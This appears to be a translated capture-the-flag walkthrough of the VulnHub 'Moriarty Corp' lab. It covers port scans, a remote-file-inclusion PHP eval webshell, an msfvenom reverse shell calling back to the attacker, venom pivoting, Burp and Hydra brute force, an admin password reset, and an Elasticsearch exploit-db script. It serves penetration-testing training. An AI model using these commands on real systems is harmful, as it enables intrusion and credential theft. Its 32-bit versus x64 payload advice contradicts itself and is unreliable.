Table of Contents
1. Environment setup
2. Target drone
3. Tool preparation
4. Detailed steps
1. Information collection
1.1 Port scanning (all ports)
1.1.1 Perform port detection on the target machine IP. To prevent leakage, be sure to use full port scanning.
1.1.2 In order to prevent missing scans, nmap is used here to perform a full port scan.
1.2 8000 port exploration
?edit
Find the first flag
1.3 9000 port exploration
2. File contains
2.1 Make sure the file contains
2.2 Write a sentence Trojan
Find the second flag
3. Rebound shell
3.1 Check the system kernel version
3.2 Making Linux Trojan
3.3 Upload Trojans
3.4 Msf turns on monitoring
3.5 Run Trojan
3.6 Establish a session
4.Intranet penetration
4.1 Build an agent
4.1.1 Enable venom server monitoring
4.1.2 Open venom client
4.1.3 Using socks5 proxy
4.2 Intranet detection
4.2.1 Detecting live web hosts on the intranet
4.3 File upload (172.017.0.4)
4.3.1 Set browser proxy
4.3.2 Accessing the website
4.3.3 Brute force cracking
4.3.4 Connect to webshell
Find the third flag
5. Brute force the connection ssh* (172.17.0.5)
5.1Submit flag
5.2 Use online md5 decryption tool to decrypt the above hash
5.3 Scan intranet hosts with port 22
5.4 Brute force cracking with Hydra
5.5 Remote connection ssh
Found the fourth flag
6. Unauthorized access (172.17.0.6)
6.1Submit flag
6.2 Scan the intranet host IP of the chat server
6.3 Access to the website
6.4 Change administrator password
6.5 Log in to the admin user interface
7. Elasticsearch vulnerability (172.17.0.7)
7.1Submit flag
7.2 Find the intranet host with port 9200
7.3 Use searchsploit to search for Elasticsearch vulnerability exploitation scripts
7.4 Utilizing scripts
Get the sixth flag
1. Environment construction
Shooting Range Download: BoredHackerBlog: Moriarty Corp ~ VulnHub
Attack aircraft: 192.168.118.131 (kali)
Target drone: 192.168.118.129
Change root password in Ubuntu 18.04:
Press shift when booting up and select the second option.
Choose the second option.
Select root.
passwd root changes password.
2. Target of drone
Find six flag values.
3. Tool preparation
Port scanning: masscan, nmap
Webshell tools: gozilla, ant sword
Packet capture: burpsuite
Proxy: proxychains, venom (https://github.com/Dliv3/Venom/)
Four. Detailed steps
1. Information collection
1.1 Port Scan (Full Port)
1.1.1 Perform port detection on the target machine IP. To prevent leakage, be sure to use full port scanning.
Tools used: masscan
masscan -p 0-65535 192.168.118.129 --rate=1000
1.1.2 To prevent missed scans, nmap is used to perform a full-port scan. .
Tools used: nmap
nmap -sS 192.168.118.129 -p 0-65535
A total of three ports were found – 22 (ssh), 8000 (http), 9000 (cslistener).
1.2 9000 port exploration
http://192.168.118.129:9000/#/auth
Portainer is an open source Docker container management system. From this, it can be seen that the current website is likely to be in docker and needs to be docker escaped.
I tried the default password admin/admin, but couldn’t log in. The brute force cracking failed, so I looked for other breakthroughs.
1.3 8000 port exploration
http://192.168.118.129:8000/
First flag found
flag{start}
According to the page prompts, access port 80
Visit http://192.168.118.129:8000
The following interface is obtained. It is suspected that there is a file containing
2. File contains
2.1 Confirm the existence of file inclusion
Test that the following payload does exist and is included in the file:
http://192.168.118.129:8000/?file=/etc/passwd
2.2 Write a sentence Trojan
Start the web service in any folder of kali.
Python3 -m http.server
Create the bb.txt file in the directory where the web service is enabled. The content is:
<?php phpinfo();?>
The remote file contains bb.txt on kali to test whether it is successful.
The following page appears to prove that remote file inclusion can be used:
Modify the content of bb.txt into a one-sentence Trojan
<?php @eval($_POST[cmd’]);?>
Connect to the webshell management tool, here I use Ant Sword.
Second flag found
flag{the_game_is_on}
View the file and go to http://192.168.118.129:8000 to submit the flag.
Get the next page. According to the page prompts, there is a database website, intranet IP: 172.17.0.3-254.
3.Rebound shell
3.1 Check the system kernel version
Obtain the system kernel: linux 4.15, 64-bit. This step is very important and is related to the subsequent production of Trojans.
uname -a
3.2 Making a Linux Trojan
Tools used: msfvnom
Since the target system is a 32-bit Linux system, you must select the Linux/x86 module when selecting the payload. The module that was previously set to x64 cannot be executed on the target machine.
msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=192.168.118.131 lport=9999 -f elf > cacaca.elf
3.3 Upload Trojan
Upload the Trojan directly through Ant Sword
Add executable permissions to the Trojan
ls -al #View permissions chmod 777 cacaca.elf
3.4 Msf turns on monitoring
Msfconsole #Start the msf tool use exploit/multi/handler Set payload linux/x64/meterpreter/reverse_tcp #The module here must be the same as the module in the Trojan Set lhost 192.168.118.131 #Same as in Trojan Set lport 9999 #Same as in Trojan Run #Start monitoring
3.5 running Trojan
Run cacaca.elf, in Godzilla’s command execution terminal, switch to the location where the Trojan is stored and execute it directly.
./cacaca.elf
3.6 Create session
msf gets a meterpreter (session), but the permissions are very low, just the apache user.
4. Intranet penetration
According to the prompt web page, it indicates that there is an intranet.
4.1 Build a proxy
Tools used: venom
4.1.1 Enable venom server monitoring
Start the venom server and listen for connections on port 3333.
./admin_linux_x64 lport 3333
4.1.2 Open venom client
Enable the http service in the venom directory
Python3 -m http.server
Download the agent_linux_x64 client file on the target machine
wget http://192.168.118.131:3333/agent_linux_x64
Open the client on the target machine to establish a connection with the server, and the server generates a node that connects to the client.
Chmod + x ./agent_linux_x64 #Add executable permissions ./agent_linux_x64 rhost 192.168.118.131 -rport 3333
4.1.3 Use socks5 proxy
Check the current node number, enter the node, and set socks5.
Show Goto 2 #Enter the node and note that its number is consistent with the one viewed Socks 8376 #The default is socks5
4.2 Intranet Detection
4.2.1 Detecting web hosts that are alive in the intranet
According to the prompt on the flag submission page, there is a database website on the intranet, so the host IP of the surviving web service on the intranet is detected, and the network segment range is 172.17.0.3-254.
Tools used: proxychains
Modify the configuration proxychains file and add the socks5 proxy just built on venom in the last line.
Vim /etc/proxychains4.conf Socks5 127.0.0.1 8376
Start detecting intranet surviving hosts
proxychains nmap 172.17.0.3-254 -sV -sT -Pn -T4 -p80
The detection results are as follows. Port 80 of the 172.17.0.4 host is alive.
4.3 File Upload (172.017.0.4)
4.3.1 Set browser proxy
Tools used: Firefox plug-in foxyproxy
The browser proxy configuration is as follows:
4.3.2 Visit the website
Access the web website of the intranet host 172.17.0.4 and find the file upload function point but a password is required.
4.3.3 Brute force cracking
Brute force cracking of file upload passwords
Tools used: burpsuite
1. Set the bp upper-level proxy, and set the port to the proxy port 8376 previously set on venom, as shown in the figure:
2. Set up a bp local proxy, which will capture browser data packets.
3. Set the browser proxy to bp’s local proxy.
4. Capture packets when uploading files and set the file upload password as the blast point.
5. Set the payload and start blasting.
6. Brute force cracking is successful, the password is password
4.3.4 Connect to webshell
1. Generate Godzilla Trojan bb.php
2. Change the browser proxy back to socks5 proxy and upload the Trojan file bb.php
3. Directly right-click the bb.php link to obtain the storage path of bb.php on the website.
4. Connect to Godzilla and pay attention to setting the proxy.
The third flag found
flag{picture_is_worth_1000_words}
5. Brute force to connect ssh* (172.17.0.5)
5.1 Submit flag
Get next step tips:
Some username and password hashes for ssh, using these usernames and passwords to continue the attack.
5.2 Use the online md5 decryption tool to decrypt the above hash
Online tools: MD5 free online decryption cracking_MD5 online encryption-SOMD5 decryption results:
63a9f0ea7bb98050796b649e85481845 (root) 7b24afc8bc80e548d66c4e7ff72171c5 (toor) 5f4dcc3b5aa765d61d8327deb882cf99 (password) 21232f297a57a5a743894a0e4a801fc3 (admin) 084e0343a0486ff05530df6c705c8bb4 (guest) 697c6cc76fdbde5baccb7b3400391e30 (MORIARTY) 8839cfc8a0f24eb155ae3f7f205f5cbc (MCORP) 35ac704fe1cc7807c914af478f20fd35 (mcorp) b27a803ed346fbbf6d2e2eb88df1c51b (weapons) 08552d48aa6d6d9c05dd67f1b4ba8747 (moriarty)
5.3 Scan for intranet hosts with port 22
proxychains nmap -p22 -sT -Pn 172.17.0.3-254
5.4 Brute force cracking with Hydra
Store the username and clear text password in user.txt and pass.txt respectively.
proxychains hydra -L user.txt -P pass.txt ssh://172.17.0.5
The results are as follows: root weapons
5.5 remote connection ssh
The permission is root.
Fourth flag found
flag{what_weapons}
6. Unauthorized access (172.17.0.6)
6.1 Submit flag
Get a tip: There is another website, the port is not 80, but one of 443, 8000, 8080, 8888.
Username: buyer13
Password: arms13
6.2 Scan the intranet host IP of the chat server
proxychains nmap -p443,8080,8000,8888 -sT -Pn 172.17.0.3-254
The result is as follows: 172.17.0.6:8000
6.3 Visit the website
Enter the username and password obtained previously:
Username: buyer13
Password: arms13
Click chats and find the administrator username: admin.
6.4 Change administrator password
Click change password to enter the password change interface.
1. Bp packet capture
2. Modify the package and change the admin password to 123456
6.5 Login admin user interface
Note: If the buyer user cannot log out in Kali, change the browser.
The local browser is used here, and the proxy settings are as follows:
Log in as admin user
Find the fifth flag
flag{on_the_move}
7. Elasticsearch vulnerability (172.17.0.7)
7.1 Submit flag
According to the prompt: there is a back-end database and Elasticsearch is used. Elasticsearch is an open source, highly scalable distributed full-text search engine that listens to port 9200 by default.
7.2 Find intranet hosts with port 9200
proxychains nmap 172.17.0.3-254 -sV -sT -Pn -T4 -p9200
7.3 Use searchsploit to search for Elasticsearch vulnerability exploit scripts
searchsploit -t Elasticsearch searchsploit -x linux/remote/36337.py cp /usr/share/exploitdb/exploits/linux/remote/36337.py ./
7.4 Exploiting Scripts
proxychains curl -XPOST '172.17.0.7:9200/twitter/user/yren' -d '{"name":"ss"}' proxychains python2 36337.py 172.17.0.7
Get the sixth flag
flag{game_over}
Submit the flag and end.
The knowledge points of the article match the official knowledge files, and you can further learn related knowledge. Network Skill TreeHomepageOverview 42283 people are learning the system